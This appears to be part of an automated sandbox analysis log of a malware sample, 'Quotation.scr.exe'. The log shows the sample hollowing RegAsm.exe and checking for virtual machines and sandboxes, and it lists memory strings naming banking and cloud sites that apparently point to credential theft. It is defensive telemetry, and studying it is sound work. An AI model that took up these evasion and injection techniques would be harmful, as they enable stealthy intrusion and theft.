                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                    Malware Analysis System Evasion

                    barindex
                    Source: Yara matchFile source: Process Memory Space: Quotation.scr.exe PID: 3108, type: MEMORYSTR
                    Source: Quotation.scr.exe, 00000000.00000002.2245862196.0000000002427000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL
                    Source: C:\Users\user\Desktop\Quotation.scr.exeMemory allocated: 2240000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\Quotation.scr.exeMemory allocated: 23E0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\Quotation.scr.exeMemory allocated: 43E0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMemory allocated: 12D0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMemory allocated: 2D10000 memory reserve | memory write watchJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMemory allocated: 1410000 memory reserve | memory write watchJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 600000Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 599875Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 599765Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 599656Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 599546Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 599437Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 599324Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 599203Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 599093Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 598984Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 598875Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 598765Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 598656Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 598546Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 598437Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 598328Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 598218Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 598109Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 598000Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 597890Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 597781Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 597672Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 597562Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 597453Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 597342Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 597218Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 597108Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 596984Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 596859Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 596750Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 596640Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 596531Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 596421Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 596312Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 596203Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 596093Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 595984Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 595859Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 595750Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 595640Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 595531Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 595421Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 595312Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 595203Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 595093Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 594984Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 594859Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 594734Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 594625Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 594515Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWindow / User API: threadDelayed 7973Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWindow / User API: threadDelayed 1884Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6080Thread sleep time: -22136092888451448s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6080Thread sleep time: -600000s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6080Thread sleep time: -599875s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 5664Thread sleep count: 7973 > 30Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6080Thread sleep time: -599765s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 5664Thread sleep count: 1884 > 30Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6080Thread sleep time: -599656s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6080Thread sleep time: -599546s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6080Thread sleep time: -599437s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6080Thread sleep time: -599324s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6080Thread sleep time: -599203s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6080Thread sleep time: -599093s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6080Thread sleep time: -598984s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6080Thread sleep time: -598875s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6080Thread sleep time: -598765s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6080Thread sleep time: -598656s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6080Thread sleep time: -598546s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6080Thread sleep time: -598437s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6080Thread sleep time: -598328s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6080Thread sleep time: -598218s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6080Thread sleep time: -598109s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6080Thread sleep time: -598000s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6080Thread sleep time: -597890s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6080Thread sleep time: -597781s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6080Thread sleep time: -597672s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6080Thread sleep time: -597562s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6080Thread sleep time: -597453s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6080Thread sleep time: -597342s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6080Thread sleep time: -597218s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6080Thread sleep time: -597108s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6080Thread sleep time: -596984s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6080Thread sleep time: -596859s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6080Thread sleep time: -596750s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6080Thread sleep time: -596640s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6080Thread sleep time: -596531s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6080Thread sleep time: -596421s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6080Thread sleep time: -596312s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6080Thread sleep time: -596203s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6080Thread sleep time: -596093s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6080Thread sleep time: -595984s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6080Thread sleep time: -595859s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6080Thread sleep time: -595750s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6080Thread sleep time: -595640s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6080Thread sleep time: -595531s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6080Thread sleep time: -595421s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6080Thread sleep time: -595312s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6080Thread sleep time: -595203s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6080Thread sleep time: -595093s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6080Thread sleep time: -594984s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6080Thread sleep time: -594859s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6080Thread sleep time: -594734s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6080Thread sleep time: -594625s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6080Thread sleep time: -594515s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 600000Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 599875Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 599765Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 599656Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 599546Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 599437Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 599324Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 599203Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 599093Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 598984Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 598875Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 598765Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 598656Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 598546Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 598437Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 598328Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 598218Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 598109Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 598000Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 597890Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 597781Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 597672Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 597562Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 597453Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 597342Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 597218Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 597108Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 596984Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 596859Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 596750Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 596640Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 596531Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 596421Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 596312Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 596203Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 596093Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 595984Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 595859Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 595750Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 595640Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 595531Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 595421Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 595312Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 595203Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 595093Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 594984Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 594859Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 594734Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 594625Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 594515Jump to behavior
                    Source: RegAsm.exe, 00000002.00000002.4576678268.0000000003FCD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
                    Source: RegAsm.exe, 00000002.00000002.4576678268.0000000003FCD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696487552|UE
                    Source: RegAsm.exe, 00000002.00000002.4576678268.0000000003FCD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696487552u
                    Source: RegAsm.exe, 00000002.00000002.4576678268.0000000003FCD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696487552f
                    Source: RegAsm.exe, 00000002.00000002.4576678268.0000000003FCD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696487552x
                    Source: RegAsm.exe, 00000002.00000002.4576678268.0000000003FCD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696487552}
                    Source: RegAsm.exe, 00000002.00000002.4576678268.0000000003FCD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696487552
                    Source: RegAsm.exe, 00000002.00000002.4576678268.0000000003FCD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696487552
                    Source: RegAsm.exe, 00000002.00000002.4576678268.0000000003FCD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
                    Source: RegAsm.exe, 00000002.00000002.4576678268.0000000003FCD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696487552
                    Source: RegAsm.exe, 00000002.00000002.4576678268.0000000003FCD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696487552o
                    Source: RegAsm.exe, 00000002.00000002.4576678268.0000000003FCD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696487552
                    Source: RegAsm.exe, 00000002.00000002.4576678268.0000000003FCD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696487552d
                    Source: RegAsm.exe, 00000002.00000002.4576678268.0000000003FCD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696487552
                    Source: RegAsm.exe, 00000002.00000002.4576678268.0000000003FCD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696487552j
                    Source: RegAsm.exe, 00000002.00000002.4576678268.0000000003FCD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696487552]
                    Source: RegAsm.exe, 00000002.00000002.4576678268.0000000003FCD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696487552x
                    Source: RegAsm.exe, 00000002.00000002.4576678268.0000000003FCD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696487552
                    Source: RegAsm.exe, 00000002.00000002.4576678268.0000000003FCD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696487552h
                    Source: RegAsm.exe, 00000002.00000002.4576678268.0000000003FCD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
                    Source: RegAsm.exe, 00000002.00000002.4576678268.0000000003FCD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
                    Source: RegAsm.exe, 00000002.00000002.4576678268.0000000003FCD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696487552t
                    Source: RegAsm.exe, 00000002.00000002.4576678268.0000000003FCD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
                    Source: Quotation.scr.exe, 00000000.00000002.2245862196.0000000002427000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SerialNumber0VMware|VIRTUAL|A M I|XenDselect * from Win32_ComputerSystem
                    Source: Quotation.scr.exe, 00000000.00000002.2245312531.00000000005C5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllG
                    Source: RegAsm.exe, 00000002.00000002.4576678268.0000000003FCD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
                    Source: RegAsm.exe, 00000002.00000002.4576678268.0000000003FCD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
                    Source: Quotation.scr.exe, 00000000.00000002.2245862196.0000000002427000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: model0Microsoft|VMWare|Virtual
                    Source: RegAsm.exe, 00000002.00000002.4576678268.0000000003FCD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696487552s
                    Source: RegAsm.exe, 00000002.00000002.4576678268.0000000003FCD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696487552
                    Source: RegAsm.exe, 00000002.00000002.4576678268.0000000003FCD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696487552t
                    Source: RegAsm.exe, 00000002.00000002.4576678268.0000000003FCD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696487552x
                    Source: RegAsm.exe, 00000002.00000002.4572806389.00000000010AB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll{P+"I
                    Source: RegAsm.exe, 00000002.00000002.4576678268.0000000003FCD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696487552}
                    Source: RegAsm.exe, 00000002.00000002.4576678268.0000000003FCD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552
                    Source: C:\Users\user\Desktop\Quotation.scr.exeProcess information queried: ProcessInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation.scr.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Users\user\Desktop\Quotation.scr.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Users\user\Desktop\Quotation.scr.exeMemory allocated: page read and write | page guardJump to behavior

                    HIPS / PFW / Operating System Protection Evasion

                    barindex
                    Source: C:\Users\user\Desktop\Quotation.scr.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and writeJump to behavior
                    Source: C:\Users\user\Desktop\Quotation.scr.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5AJump to behavior
                    Source: C:\Users\user\Desktop\Quotation.scr.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000Jump to behavior
